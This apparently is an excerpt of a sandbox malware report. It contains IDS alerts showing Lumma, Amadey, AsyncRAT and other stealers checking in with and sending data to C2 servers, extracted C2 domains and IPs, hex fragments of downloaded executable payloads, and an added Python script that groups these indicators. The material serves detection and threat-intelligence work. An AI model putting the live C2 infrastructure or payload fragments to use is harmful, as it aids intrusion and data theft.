                                Source: Network trafficSuricata IDS: 2059431 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mixedrecipew .biz) : 192.168.11.20:52041 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.11.20:49814 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2059907 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (actiothreaz .com) : 192.168.11.20:49952 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.11.20:49816 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.11.20:49822 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.11.20:49821 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert : 93.88.203.169:56001 -> 192.168.11.20:49820
                                Source: Network trafficSuricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.11.20:49823 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.11.20:49826 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.11.20:49828 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.11.20:49825 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.11.20:49831 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 87.120.113.214:4449 -> 192.168.11.20:49834
                                Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.11.20:49837 -> 41.216.188.198:80
                                Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.11.20:49837 -> 41.216.188.198:80
                                Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.11.20:49837 -> 41.216.188.198:80
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.11.20:49829 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.11.20:49797 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.11.20:49812 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.11.20:49818 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.11.20:49817 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.11.20:49824 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2031198 - Severity 1 - ET MALWARE Win32/HunterStealer/AlfonsoStealer/PhoenixStealer CnC Exfil : 192.168.11.20:49832 -> 109.94.208.20:5972
                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.11.20:49759 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.11.20:49761 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49759 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49761 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.11.20:49768 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.11.20:49787 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49787 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.11.20:49782 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.11.20:49784 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49784 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.11.20:49797 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.11.20:49818 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49818 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.11.20:49821 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49799 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.11.20:49809 -> 23.204.173.220:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49828 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49771 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.11.20:49775 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49775 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49795 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.11.20:49777 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49777 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.11.20:49816 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49816 -> 104.21.112.1:443
                                Source: Malware configuration extractorIPs: 185.215.113.43
                                Source: Malware configuration extractorURLs: cozyhomevpibes.cyou
                                Source: Malware configuration extractorURLs: importenptoc.com
                                Source: Malware configuration extractorURLs: voicesharped.com
                                Source: Malware configuration extractorURLs: inputrreparnt.com
                                Source: Malware configuration extractorURLs: torpdidebar.com
                                Source: Malware configuration extractorURLs: rebeldettern.com
                                Source: Malware configuration extractorURLs: actiothreaz.com
                                Source: Malware configuration extractorURLs: garulouscuto.com
                                Source: Malware configuration extractorURLs: breedertremnd.com
                                Source: unknownDNS traffic detected: query: impolitewearr.biz reply code: Name error (3)
                                Source: unknownDNS traffic detected: query: cozyhomevpibes.cyou reply code: Name error (3)
                                Source: unknownDNS traffic detected: query: UrDtxPvdestkLUKCgdoC.UrDtxPvdestkLUKCgdoC reply code: Name error (3)
                                Source: unknownDNS traffic detected: query: suggestyuoz.biz reply code: Name error (3)
                                Source: unknownDNS traffic detected: query: edcatiofireeu.shop reply code: Name error (3)
                                Source: unknownDNS traffic detected: query: toppyneedus.biz reply code: Name error (3)
                                Source: unknownDNS traffic detected: query: pleasedcfrown.biz reply code: Name error (3)
                                Source: unknownDNS traffic detected: query: hoursuhouy.biz reply code: Name error (3)
                                Source: unknownDNS traffic detected: query: mixedrecipew.biz reply code: Name error (3)
                                Source: unknownDNS traffic detected: query: affordtempyo.biz reply code: Name error (3)
                                Source: unknownDNS traffic detected: query: lightdeerysua.biz reply code: Name error (3)
                                Source: global trafficTCP traffic: 192.168.11.20:49802 -> 159.100.19.137:7707
                                Source: global trafficTCP traffic: 192.168.11.20:49808 -> 87.120.113.214:4449
                                Source: global trafficTCP traffic: 192.168.11.20:49820 -> 93.88.203.169:56001
                                Source: global trafficTCP traffic: 192.168.11.20:49832 -> 109.94.208.20:5972
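The alert list above mixes three kinds of record that need different handling before they become indicators: client-side alerts logged client -> server, server-certificate and JA3S alerts logged server -> client, and DNS-lookup alerts whose destination is the resolver rather than the C2. The Python below is an added example, not part of the Joe Sandbox report; it parses a sample of the lines above (copied verbatim with the leading "Source: Network traffic" cell dropped) and groups remote endpoints and domains by family. The sandbox host address, the resolver list and the keyword-to-family mapping are assumptions of this example.

```python
"""Pivot Suricata alert lines from the report into per-family C2 endpoints and domains.

Added example, not part of the Joe Sandbox report.  SAMPLE_ALERTS are copied from
the report's Networking section with the leading "Source: Network traffic" cell
dropped; the sandbox host, the resolver list and FAMILY_KEYWORDS are assumptions."""
import re
from collections import defaultdict

ALERT_RE = re.compile(
    r"Suricata IDS: (?P<sid>\d+) - Severity (?P<sev>\d) - (?P<msg>.+?) : "
    r"(?P<sip>[\d.]+):(?P<sport>\d+) -> (?P<dip>[\d.]+):(?P<dport>\d+)\s*$"
)
# ET rule names defang the domain inside parentheses, e.g. "(rebeldettern .com in TLS SNI)".
DOMAIN_RE = re.compile(r"\(([\w-]+(?:\s?\.[\w-]+)+)(?: in TLS SNI)?\)")

FAMILY_KEYWORDS = [  # lower-cased substring of the rule name -> family label (assumed mapping)
    ("amadey", "Amadey"),
    ("lumma", "LummaC Stealer"),
    ("asyncrat", "AsyncRAT"),
    ("litehttp", "LiteHTTP Bot"),
    ("hunterstealer", "HunterStealer/AlfonsoStealer/PhoenixStealer"),
]

SAMPLE_ALERTS = """\
Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.11.20:49756 -> 185.215.113.43:80
Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.11.20:49759 -> 172.67.150.254:443
Suricata IDS: 2059927 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebeldettern .com) : 192.168.11.20:63898 -> 1.1.1.1:53
Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.11.20:49757
Suricata IDS: 2059985 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cozyhomevpibes .cyou) : 192.168.11.20:63210 -> 1.1.1.1:53
Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 159.100.19.137:7707 -> 192.168.11.20:49802
Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 87.120.113.214:4449 -> 192.168.11.20:49808
Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert : 93.88.203.169:56001 -> 192.168.11.20:49820
Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.11.20:49837 -> 41.216.188.198:80
Suricata IDS: 2031198 - Severity 1 - ET MALWARE Win32/HunterStealer/AlfonsoStealer/PhoenixStealer CnC Exfil : 192.168.11.20:49832 -> 109.94.208.20:5972
Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.11.20:49809 -> 23.204.173.220:443
""".splitlines()


def family_of(msg):
    low = msg.lower()
    for keyword, family in FAMILY_KEYWORDS:
        if keyword in low:
            return family
    return "unknown"


def refang(domain):
    return re.sub(r"\s+\.", ".", domain)


def summarize(lines, host="192.168.11.20", resolvers=("1.1.1.1",)):
    c2 = defaultdict(set)        # family -> {"ip:port", ...}
    domains = defaultdict(dict)  # family -> {domain: ip the SNI was seen on, or None}
    counts = defaultdict(int)
    for line in lines:
        m = ALERT_RE.search(line)
        if not m:
            continue
        family = family_of(m["msg"])
        counts[family] += 1
        # Server-certificate and JA3S rules fire on the server's packets, so the
        # alert is logged server -> client; pick the remote end by excluding the
        # sandbox host instead of trusting the direction.
        if m["sip"] == host:
            rip, rport = m["dip"], m["dport"]
        else:
            rip, rport = m["sip"], m["sport"]
        dm = DOMAIN_RE.search(m["msg"])
        domain = refang(dm.group(1)) if dm else None
        if rip in resolvers:
            # DNS-lookup rules name the C2 domain, but the packet went to the resolver.
            if domain:
                domains[family].setdefault(domain, None)
            continue
        c2[family].add(f"{rip}:{rport}")
        if domain:
            domains[family][domain] = rip
    return {"c2": dict(c2), "domains": dict(domains), "counts": dict(counts)}


if __name__ == "__main__":
    result = summarize(SAMPLE_ALERTS)
    for family, endpoints in sorted(result["c2"].items()):
        print(f"{family}: {sorted(endpoints)}  ({result['counts'][family]} alerts)")
    for family, seen in sorted(result["domains"].items()):
        print(f"{family} domains: {seen}")
```

Two details matter in practice. Picking the remote end by excluding the sandbox host, rather than by position, is what keeps 192.168.11.20 out of the AsyncRAT set for the ja3s alerts, and treating 1.1.1.1:53 as a resolver is what stops the DNS-lookup alerts from turning your own resolver into a "Lumma C2". The Lumma endpoints the script does return are shared infrastructure (Cloudflare-fronted addresses and the Steam profile host named by signature 2858666), so the domains, including the ones that only ever appeared as NXDOMAIN lookups, are the part of the output worth acting on.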
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:19:47 GMTContent-Type: application/octet-streamContent-Length: 2161152Last-Modified: Tue, 11 Feb 2025 07:34:15 GMTConnection: keep-aliveETag: "67aafd77-20fa00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 60 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 4c 00 00 04 00 00 49 8f 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 47 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 46 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 
73 72 63 00 00 00 58 04 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2b 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 74 72 78 6e 7a 69 6b 00 40 1a 00 00 10 32 00 00 3c 1a 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 79 68 7a 66 62 6a 6d 00 10 00 00 00 50 4c 00 00 04 00 00 00 d4 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 4c 00 00 22 00 00 00 d8 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:20:07 GMTContent-Type: application/octet-streamContent-Length: 2085888Last-Modified: Tue, 11 Feb 2025 08:16:43 GMTConnection: keep-aliveETag: "67ab076b-1fd400"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 12 25 9e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 66 04 00 00 ac 00 00 00 00 00 00 00 d0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4b 00 00 04 00 00 62 98 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 90 05 00 6b 00 00 00 00 80 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 05 00 00 10 00 00 00 70 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 80 05 00 00 02 00 00 00 80 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 05 00 00 02 00 00 00 82 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 2a 00 00 a0 05 00 00 02 00 00 00 84 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 64 63 63 70 79 78 77 00 30 1a 00 00 90 30 00 00 28 1a 00 00 86 05 00 00 00 
00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 65 78 61 61 74 73 65 00 10 00 00 00 c0 4a 00 00 04 00 00 00 ae 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 4a 00 00 22 00 00 00 b2 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:20:14 GMTContent-Type: application/octet-streamContent-Length: 2150400Last-Modified: Tue, 11 Feb 2025 08:17:13 GMTConnection: keep-aliveETag: "67ab0789-20d000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1d e9 b6 df 59 88 d8 8c 59 88 d8 8c 59 88 d8 8c 33 94 da 8c 70 88 d8 8c 59 88 d9 8c 5b 88 d8 8c eb 94 c8 8c 5b 88 d8 8c 59 88 d8 8c 56 88 d8 8c e1 8e de 8c 58 88 d8 8c 52 69 63 68 59 88 d8 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 45 5f 8e 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 de 00 00 00 b6 05 00 00 00 00 00 00 e0 4a 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 4b 00 00 04 00 00 2f 9d 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b f0 06 00 6f 00 00 00 00 e0 06 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 06 00 00 10 00 00 00 4a 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 e0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 06 00 00 02 
00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 29 00 00 00 07 00 00 02 00 00 00 60 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 64 69 6b 6e 62 68 69 00 50 1a 00 00 80 30 00 00 48 1a 00 00 62 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 63 61 69 73 67 79 72 00 10 00 00 00 d0 4a 00 00 04 00 00 00 aa 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 4a 00 00 22 00 00 00 ae 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:20:20 GMTContent-Type: application/octet-streamContent-Length: 866906Last-Modified: Fri, 24 Jan 2025 12:37:12 GMTConnection: keep-aliveETag: "67938978-d3a5a"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 62 7c 80 4e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7e 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 00 11 00 00 04 00 00 e2 fd 0d 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 6a ed 00 00 00 00 00 00 00 00 00 00 e2 10 0d 00 78 29 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 